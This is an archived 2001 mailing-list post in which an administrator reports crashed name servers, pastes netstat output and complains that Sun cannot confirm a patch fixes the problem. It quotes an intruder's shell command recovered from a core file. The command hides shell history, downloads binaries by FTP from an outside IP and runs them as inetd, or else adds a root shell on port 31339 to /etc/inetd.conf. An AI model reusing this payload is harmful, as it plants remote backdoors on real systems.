All my name servers cored connections looked like thislocalhost.36486 localhost.32773 32768 0 8192 0 ESTABLISHED localhost.32773 localhost.36486 8192 0 32768 0 ESTABLISHED localhost.36489 localhost.32773 32768 0 8192 0 ESTABLISHED localhost.32773 localhost.36489 8192 0 32768 0 ESTABLISHED localhost.36492 localhost.36484 32768 0 8192 0 ESTABLISHED localhost.36484 localhost.36492 8192 0 32768 0 ESTABLISHED localhost.36495 localhost.36494 32768 0 8192 0 ESTABLISHED localhost.36494 localhost.36495 8192 0 32768 0 ESTABLISHED localhost.36498 localhost.36484 32768 0 8192 0 ESTABLISHED localhost.36484 localhost.36498 8192 0 32768 0 ESTABLISHED localhost.36501 localhost.36500 32768 0 8192 0 ESTABLISHED localhost.36500 localhost.36501 8192 0 32768 0 ESTABLISHED localhost.36516 localhost.36484 32768 0 8192 0 ESTABLISHED localhost.36484 localhost.36516 8192 0 32768 0 ESTABLISHED localhost.36519 localhost.36518 32768 0 8192 0 ESTABLISHED localhost.36518 localhost.36519 8192 0 32768 0 ESTABLISHED > this is in the core file >/bin/bash >export HISTFILE=;if [ ! -x /sbin/inetd ];then cd /sbin;ping -c 1 208.21.174.3;ec >ho -e 'open 208.21.174.3\nuser ftp hat_private\nbin\nget i\nget d\nbye'|ftp -vin;if [ >-f i ];then chmod a+rx i d;mv i inetd;./d;else echo '31339 stream tcp nowait roo >t /bin/bash sh -i'>/etc/inetd.conf;fi;fie Sun tells me to appl the latest patch but 7 phone calls later can't tell me if the patch addresses this hack. =;{>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:18 PDT